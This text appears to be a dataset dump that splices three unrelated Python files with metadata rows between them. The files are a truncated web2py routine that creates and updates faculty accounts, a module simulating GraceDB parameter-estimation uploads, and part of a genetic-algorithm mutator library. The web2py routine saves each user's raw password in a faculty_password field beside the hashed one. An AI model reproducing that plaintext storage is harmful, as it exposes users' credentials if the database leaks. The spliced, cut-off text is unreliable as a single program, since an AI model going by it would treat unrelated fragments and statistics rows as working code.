user = db(db.faculty_info.user_id == row.user_id).select().first()
if user is None:
# User doesn't exist, create it
# Create the new user in web2py
uid = db.auth_user.insert(last_name=last_name,
first_name=first_name,
username=user_name,
password=db.auth_user.password.validate(password)[0],
email=user_email
)
# Put the user in the faculty group
auth.add_membership('Faculty', uid)
default_ad_quota = user_ad_quota
default_canvas_quota = user_canvas_quota
# Move the rest of the info in place
db.faculty_info.insert(
account_id=uid,
user_id=row.user_id,
faculty_name=row.faculty_name,
faculty_password=password,
import_classes=row.import_classes,
program=row.program,
additional_fields=row.additional_fields,
sheet_name=row.sheet_name,
faculty_guid=row.faculty_guid,
account_enabled=row.account_enabled,
account_added_on=row.account_updated_on,
account_updated_on=row.account_updated_on,
faculty_ad_quota=default_ad_quota,
faculty_canvas_quota=default_canvas_quota
)
pass
else:
# User exists, update web2py info
db(db.auth_user.id == user.account_id).update(
last_name=last_name,
first_name=first_name,
username=user_name,
# Don't overwrite existing password, GetPasswordForStudent
# Should have returned the current password so this is ok.
password=db.auth_user.password.validate(password)[0],
email=user_email
)
# Update user info
user.update_record(
faculty_name=row.faculty_name,
faculty_password=password,
import_classes=row.import_classes,
program=row.program,
additional_fields=row.additional_fields,
sheet_name=row.sheet_name,
account_enabled=row.account_enabled,
account_updated_on=row.account_updated_on,
faculty_ad_quota=user_ad_quota,
faculty_canvas_quota=user_canvas_quota
)
# Make sure the user in the faculty group
auth.add_membership('Faculty', user.account_id)
pass
# EndWeb2PyAPIClass
| 40.183168 | 118 | 0.546261 | 872 | 8,117 | 4.824541 | 0.133028 | 0.030425 | 0.033278 | 0.017114 | 0.893273 | 0.864749 | 0.864749 | 0.84716 | 0.84716 | 0.84716 | 0 | 0.003636 | 0.390169 | 8,117 | 201 | 119 | 40.383085 | 0.846263 | 0.146113 | 0 | 0.727273 | 0 | 0 | 0.005512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041958 | false | 0.146853 | 0.048951 | 0.006993 | 0.118881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a71fdb4f6d1e39a53c79bf27e9f275f02e05ed02 | 19,683 | py | Python | lib/pe.py | reedessick/lvalertTest | 4093961ac3e908b3a344181a033b644e5ef44421 | [
"MIT"
] | null | null | null | lib/pe.py | reedessick/lvalertTest | 4093961ac3e908b3a344181a033b644e5ef44421 | [
"MIT"
] | 14 | 2017-04-24T18:38:15.000Z | 2018-02-05T14:51:26.000Z | lib/pe.py | reedessick/lvalertTest | 4093961ac3e908b3a344181a033b644e5ef44421 | [
"MIT"
] | 3 | 2017-05-14T20:32:31.000Z | 2019-11-26T15:13:53.000Z | description = "a module that simulates Parameter Estimation uploads to GraceDB"
author = "reed.essick@ligo.org"
#-------------------------------------------------
import os
import random
import schedule
#-------------------------------------------------
'''
generate a different object for each follow-up. These may inherit from a single parent object, but they each should be able to produce data that would be uploaded to GraceDB
'''
class Bayestar():
def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.startTimeout = startTimeout
self.startJitter = startJitter
self.startProb = startProb
self.skymapTimeout = skymapTimeout
self.skymapJitter = skymapJitter
self.skymapProb = skymapProb
self.finishTimeout = finishTimeout
self.finishJitter = finishJitter
self.finishProb = finishProb
self.plotSkymapTimeout = plotSkymapTimeout
self.plotSkymapJitter = plotSkymapJitter
self.plotSkymapProb = plotSkymapProb
self.skyviewerTimeout = skyviewerTimeout
self.skyviewerJitter = skyviewerJitter
self.skyviewerProb = skyviewerProb
def writeFITS(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
fitsname = "%s/bayestar.fits.gz"%dirname
open(fitsname, 'w').close() ### may want to do more than this...
return fitsname
def genSchedule(self, directory='.', lvem=True):
'''
generate a schedule for Bayestar
'''
sched = schedule.Schedule()
if random.random() < self.startProb:
start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
for message in ['INFO:BAYESTAR:by your command...', 'INFO:BAYESTAR:starting sky localization']:
sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.finishProb:
finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
message = 'INFO:BAYESTAR:sky localization complete'
sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.skymapProb:
skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
message = 'INFO:BAYESTAR:uploaded sky map'
fitsname = self.writeFITS(directory=directory)
tagname = ['sky_loc']
if lvem:
tagname.append( 'lvem' )
sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )
### add in plotting and skyviewer
agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
+ Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
agenda.bump( skymap_dt )
sched += agenda
return sched
class LALInference():
def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.startTimeout = startTimeout
self.startJitter = startJitter
self.startProb = startProb
self.skymapTimeout = skymapTimeout
self.skymapJitter = skymapJitter
self.skymapProb = skymapProb
self.finishTimeout = finishTimeout
self.finishJitter = finishJitter
self.finishProb = finishProb
self.plotSkymapTimeout = plotSkymapTimeout
self.plotSkymapJitter = plotSkymapJitter
self.plotSkymapProb = plotSkymapProb
self.skyviewerTimeout = skyviewerTimeout
self.skyviewerJitter = skyviewerJitter
self.skyviewerProb = skyviewerProb
def writeFITS(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
fitsname = "%s/lalinference_skymap.fits.gz"%dirname
open(fitsname, 'w').close() ### may want to do more than this...
return fitsname
def writeDat(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
datname = "%s/posterior_samples.dat"%dirname
open(datname, 'w').close() ### may want to do more than this...
return datname
def genSchedule(self, directory='.', lvem=True):
'''
generate a schedule for Bayestar
'''
sched = schedule.Schedule()
if random.random() < self.startProb:
start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
message = 'LALInference online estimation started'
sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.finishProb:
finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
message = 'LALInference online estimation finished'
filename = self.writeDat(directory=directory)
sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.skymapProb:
skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
message = 'LALInference'
fitsname = self.writeFITS(directory=directory)
tagname = ['sky_loc']
if lvem:
tagname.append( 'lvem' )
sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )
### add in plotting and skyviewer
agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
+ Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
agenda.bump( skymap_dt )
sched += agenda
return sched
class LIB():
def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.startTimeout = startTimeout
self.startJitter = startJitter
self.startProb = startProb
self.skymapTimeout = skymapTimeout
self.skymapJitter = skymapJitter
self.skymapProb = skymapProb
self.finishTimeout = finishTimeout
self.finishJitter = finishJitter
self.finishProb = finishProb
self.plotSkymapTimeout = plotSkymapTimeout
self.plotSkymapJitter = plotSkymapJitter
self.plotSkymapProb = plotSkymapProb
self.skyviewerTimeout = skyviewerTimeout
self.skyviewerJitter = skyviewerJitter
self.skyviewerProb = skyviewerProb
def writeFITS(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
fitsname = "%s/LIB_skymap.fits.gz"%dirname
open(fitsname, 'w').close() ### may want to do more than this...
return fitsname
def writeDat(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
datname = "%s/posterior_samples.dat"%dirname
open(datname, 'w').close() ### may want to do more than this...
return datname
def genSchedule(self, directory='.', lvem=True):
'''
generate a schedule for Bayestar
'''
sched = schedule.Schedule()
if random.random() < self.startProb:
start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
message = "LIB Parameter estimation started."
sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.finishProb:
finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
message = 'LIB Parameter estimation finished'
sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.skymapProb:
skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
message = 'LIB'
fitsname = self.writeFITS(directory=directory)
tagname = ['sky_loc']
if lvem:
tagname.append( 'lvem' )
sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )
### add in plotting and skyviewer
agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
+ Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
agenda.bump( skymap_dt )
sched += agenda
return sched
class BayesWave():
def __init__(self, graceDBevent, startTimeout=10.0, startJitter=2.0, startProb=1.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.startTimeout = startTimeout
self.startJitter = startJitter
self.startProb = startProb
self.skymapTimeout = skymapTimeout
self.skymapJitter = skymapJitter
self.skymapProb = skymapProb
self.finishTimeout = finishTimeout
self.finishJitter = finishJitter
self.finishProb = finishProb
self.plotSkymapTimeout = plotSkymapTimeout
self.plotSkymapJitter = plotSkymapJitter
self.plotSkymapProb = plotSkymapProb
self.skyviewerTimeout = skyviewerTimeout
self.skyviewerJitter = skyviewerJitter
self.skyviewerProb = skyviewerProb
def writeFITS(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
fitsname = "%s/BW_skymap.fits"%dirname
open(fitsname, 'w').close() ### may want to do more than this...
return fitsname
def genSchedule(self, directory='.', lvem=True):
'''
generate a schedule for Bayestar
'''
sched = schedule.Schedule()
if random.random() < self.startProb:
start_dt = max(0, random.normalvariate(self.startTimeout, self.startJitter))
message = 'BayesWaveBurst launched'
sched.insert( schedule.WriteLog( start_dt, self.graceDBevent, message, gdb_url=self.gdb_url ) )
if random.random() < self.finishProb:
finish_dt = max(start_dt, random.normalvariate(self.finishTimeout, self.finishJitter))
for message in ['BWB Follow-up results', 'BWB parameter estimation', 'BWB Bayes Factors']:
sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, tagname=['pe'], gdb_url=self.gdb_url ) )
if random.random() < self.skymapProb:
skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
message = 'BWB'
fitsname = self.writeFITS(directory=directory)
tagname = ['sky_loc']
if lvem:
tagname.append( 'lvem' )
sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )
### add in plotting and skyviewer
agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
+ Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
agenda.bump( skymap_dt )
sched += agenda
return sched
class CoherentWaveBurst():
def __init__(self, graceDBevent, startTimeout=10.0, skymapTimeout=45.0, skymapJitter=5.0, skymapProb=1.0, finishTimeout=40.0, finishJitter=2.0, finishProb=1.0, plotSkymapTimeout=5.0, plotSkymapJitter=1.0, plotSkymapProb=1.0, skyviewerTimeout=5.0, skyviewerJitter=1.0, skyviewerProb=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.skymapTimeout = skymapTimeout
self.skymapJitter = skymapJitter
self.skymapProb = skymapProb
self.finishTimeout = finishTimeout
self.finishJitter = finishJitter
self.finishProb = finishProb
self.plotSkymapTimeout = plotSkymapTimeout
self.plotSkymapJitter = plotSkymapJitter
self.plotSkymapProb = plotSkymapProb
self.skyviewerTimeout = skyviewerTimeout
self.skyviewerJitter = skyviewerJitter
self.skyviewerProb = skyviewerProb
def writeFITS(self, directory='.'):
dirname = "%s/%s/"%(directory, self.graceDBevent.get_randStr())
if not os.path.exists(dirname):
os.makedirs(dirname)
fitsname = "%s/skyprobcc.fits.gz"%dirname
open(fitsname, 'w').close() ### may want to do more than this...
return fitsname
def genSchedule(self, directory='.', lvem=True):
'''
generate a schedule for Bayestar
'''
sched = schedule.Schedule()
if random.random() < self.finishProb:
finish_dt = max(0, random.normalvariate(self.finishTimeout, self.finishJitter))
message = 'cWB parameter estimation'
sched.insert( schedule.WriteLog( finish_dt, self.graceDBevent, message, tagname=['pe'], gdb_url=self.gdb_url ) )
if random.random() < self.skymapProb:
skymap_dt = max(finish_dt, random.normalvariate(self.skymapTimeout, self.skymapJitter))
message = 'cWB skymap fit'
fitsname = self.writeFITS(directory=directory)
tagname = ['sky_loc']
if lvem:
tagname.append( 'lvem' )
sched.insert( schedule.WriteLog( skymap_dt, self.graceDBevent, message, filename=fitsname, tagname=tagname, gdb_url=self.gdb_url ) )
### add in plotting and skyviewer
agenda = PlotSkymaps(self.graceDBevent, timeout=self.plotSkymapTimeout, jitter=self.plotSkymapJitter, probOfSuccess=self.plotSkymapProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname) \
+ Skyviewer(self.graceDBevent, timeout=self.skyviewerTimeout, jitter=self.skyviewerJitter, probOfSuccess=self.skyviewerProb, gdb_url=self.gdb_url).genSchedule(fitsname, tagname=tagname)
agenda.bump( skymap_dt )
sched += agenda
return sched
#-----------
class PlotSkymaps():
def __init__(self, graceDBevent, timeout=30.0, jitter=5.0, probOfSuccess=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.timeout = timeout
self.jitter = jitter
self.prob = probOfSuccess
def genMessage(self, fits):
return "Mollweide projection of %s"%fits
def genPNG(self, fits):
pngName = os.path.join( os.path.dirname(fits), os.path.basename(fits).split('.')[0]+".png" )
open(pngName, "w").close() ### touch it so it exists
return pngName
def genSchedule(self, fits, tagname=['sky_loc']):
sched = schedule.Schedule()
if random.random() < self.prob:
sched.insert( schedule.WriteLog( max(0, random.normalvariate(self.timeout, self.jitter)), self.graceDBevent, self.genMessage(fits), filename=self.genPNG(fits), tagname=tagname, gdb_url=self.gdb_url ) )
return sched
class Skyviewer():
def __init__(self, graceDBevent, timeout=30.0, jitter=5.0, probOfSuccess=1.0, gdb_url='https://gracedb.ligo.org/api/'):
self.graceDBevent = graceDBevent
self.gdb_url = gdb_url
self.timeout = timeout
self.jitter = jitter
self.prob = probOfSuccess
def genMessage(self):
return ''
def genJSON(self, fits):
if fits.endswith('.gz'):
fits = fits[:-3]
jsonName = fits[:-4]+"json"
open(jsonName, "w").close() ### touch it so it exists
return jsonName
def genSchedule(self, fits, tagname=['sky_loc']):
sched = schedule.Schedule()
if random.random() < self.prob:
sched.insert( schedule.WriteLog( max(0, random.normalvariate(self.timeout, self.jitter)), self.graceDBevent, self.genMessage(), filename=self.genJSON(fits), tagname=tagname, gdb_url=self.gdb_url ) )
return sched
| 48.720297 | 364 | 0.640096 | 2,045 | 19,683 | 6.081663 | 0.086553 | 0.035218 | 0.026534 | 0.027177 | 0.915253 | 0.915253 | 0.915172 | 0.907454 | 0.901102 | 0.901102 | 0 | 0.012528 | 0.249759 | 19,683 | 403 | 365 | 48.841191 | 0.829688 | 0.035513 | 0 | 0.831081 | 0 | 0 | 0.055731 | 0.00767 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084459 | false | 0 | 0.010135 | 0.006757 | 0.179054 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a726ff466ed4508de18e11670400feb7fd46a72f | 41,423 | py | Python | CAAPR/CAAPR_AstroMagic/PTS/pts/evolve/Mutators.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 7 | 2016-05-20T21:56:39.000Z | 2022-02-07T21:09:48.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/evolve/Mutators.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2019-03-21T16:10:04.000Z | 2019-03-22T17:21:56.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/evolve/Mutators.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2020-05-19T16:17:17.000Z | 2020-05-19T16:17:17.000Z | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.evolve.mutators In this module we have the genetic operators of mutation for each chromosome
# representation.
#
# -----------------------------------------------------------------
# Import other evolve modules
import utils
import constants
import tree
# Import the relevant PTS classes and modules
from ..core.tools.random import prng
# -----------------------------------------------------------------
def G1DBinaryStringMutatorSwap(genome, **args):
"""
The 1D Binary String Swap Mutator
"""
if args["pmut"] <= 0.0:
return 0
stringLength = len(genome)
mutations = args["pmut"] * (stringLength)
if mutations < 1.0:
mutations = 0
for it in xrange(stringLength):
if utils.randomFlipCoin(args["pmut"]):
utils.listSwapElement(genome, it, prng.randint(0, stringLength))
mutations += 1
else:
for it in xrange(int(round(mutations))):
utils.listSwapElement(genome, prng.randint(0, stringLength), prng.randint(0, stringLength))
return int(mutations)
# -----------------------------------------------------------------
def G1DBinaryStringMutatorFlip(genome, **args):
"""
The classical flip mutator for binary strings
"""
if args["pmut"] <= 0.0:
return 0
stringLength = len(genome)
mutations = args["pmut"] * (stringLength)
if mutations < 1.0:
mutations = 0
for it in xrange(stringLength):
if utils.randomFlipCoin(args["pmut"]):
if genome[it] == 0:
genome[it] = 1
else:
genome[it] = 0
mutations += 1
else:
for it in xrange(int(round(mutations))):
which = prng.randint(0, stringLength)
if genome[which] == 0:
genome[which] = 1
else:
genome[which] = 0
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorSwap(genome, **args):
""" The mutator of G1DList, Swap Mutator
.. note:: this mutator is :term:`Data Type Independent`
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * listSize
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
utils.listSwapElement(genome, it, prng.randint(0, listSize))
mutations += 1
else:
for it in xrange(int(round(mutations))):
utils.listSwapElement(genome, prng.randint(0, listSize), prng.randint(0, listSize))
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorSIM(genome, **args):
"""
The mutator of G1DList, Simple Inversion Mutation
.. note:: this mutator is :term:`Data Type Independent`
"""
mutations = 0
if args["pmut"] <= 0.0:
return 0
cuts = [prng.randint(0, len(genome) + 1), prng.randint(0, len(genome) + 1)] # HERE IT SHOULD BE INCLUSIVE
if cuts[0] > cuts[1]:
utils.listSwapElement(cuts, 0, 1)
if (cuts[1] - cuts[0]) <= 0:
cuts[1] = prng.randint(cuts[0], len(genome) + 1) # HERE IT SHOULD BE INCLUSIVE
if utils.randomFlipCoin(args["pmut"]):
part = genome[cuts[0]:cuts[1]]
if len(part) == 0:
return 0
part.reverse()
genome[cuts[0]:cuts[1]] = part
mutations += 1
return mutations
# -----------------------------------------------------------------
def G1DListMutatorIntegerRange(genome, **args):
""" Simple integer range mutator for G1DList
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * listSize
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
genome[it] = prng.randint(genome.getParam("rangemin", constants.CDefRangeMin), # HERE IT SHOULD BE INCLUSIVE
genome.getParam("rangemax", constants.CDefRangeMax) + 1) # HERE IT SHOULD BE INCLUSIVE
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
genome[which_gene] = prng.randint(genome.getParam("rangemin", constants.CDefRangeMin), # HERE IT SHOULD BE INCLUSIVE
genome.getParam("rangemax", constants.CDefRangeMax) + 1) # HERE IT SHOULD BE INCLUSIVE
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorRealRange(genome, **args):
""" Simple real range mutator for G1DList
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
genome[it] = prng.uniform(genome.getParam("rangemin", constants.CDefRangeMin),
genome.getParam("rangemax", constants.CDefRangeMax))
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
genome[which_gene] = prng.uniform(genome.getParam("rangemin", constants.CDefRangeMin),
genome.getParam("rangemax", constants.CDefRangeMax))
return int(mutations)
# -----------------------------------------------------------------
def HeterogeneousListMutatorRealRange(genome, **args):
"""
Real range mutator for HeterogeneousList
:param genome:
:param args:
:return:
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
genome[it] = prng.uniform(genome.getParam("minima")[it], genome.getParam("maxima")[it])
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
genome[which_gene] = prng.uniform(genome.getParam("minima")[which_gene], genome.getParam("maxima")[which_gene])
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorIntegerGaussianGradient(genome, **args):
""" A gaussian mutator for G1DList of Integers
Accepts the *rangemin* and *rangemax* genome parameters, both optional. The
random distribution is set with mu=1.0 and std=0.0333
Same as IntegerGaussian, except that this uses relative gradient rather than
absolute gaussian. A value is randomly generated about gauss(mu=1, sigma=.0333)
and multiplied by the gene to drift it up or down (depending on what side of
1 the random value falls on) and cast to integer
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
mu = constants.CDefGaussianGradientMU
sigma = constants.CDefGaussianGradientSIGMA
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
final_value = int(genome[it] * abs(prng.normal(mu, sigma)))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[it] = final_value
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
final_value = int(genome[which_gene] * abs(prng.normal(mu, sigma)))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[which_gene] = final_value
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorIntegerGaussian(genome, **args):
""" A gaussian mutator for G1DList of Integers
Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
represents the mean and the std. dev. of the random distribution.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
mu = genome.getParam("gauss_mu")
sigma = genome.getParam("gauss_sigma")
if mu is None:
mu = constants.CDefG1DListMutIntMU
if sigma is None:
sigma = constants.CDefG1DListMutIntSIGMA
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[it] + int(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[it] = final_value
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
final_value = genome[which_gene] + int(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[which_gene] = final_value
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorRealGaussian(genome, **args):
"""
The mutator of G1DList, Gaussian Mutator
Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
represents the mean and the std. dev. of the random distribution.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
mu = genome.getParam("gauss_mu")
sigma = genome.getParam("gauss_sigma")
if mu is None:
mu = constants.CDefG1DListMutRealMU
if sigma is None:
sigma = constants.CDefG1DListMutRealSIGMA
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[it] + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[it] = final_value
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
final_value = genome[which_gene] + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[which_gene] = final_value
return int(mutations)
# -----------------------------------------------------------------
def HeterogeneousListMutatorRealGaussian(genome, **args):
"""
Heregogeneous version of real gaussian list mutator
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
mu = genome.getParam("gauss_mu")
sigma = genome.getParam("gauss_sigma")
if mu is None:
mu = constants.CDefG1DListMutRealMU
if sigma is None:
sigma = constants.CDefG1DListMutRealSIGMA
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[it] + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("maxima")[it])
final_value = max(final_value, genome.getParam("minima")[it])
genome[it] = final_value
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
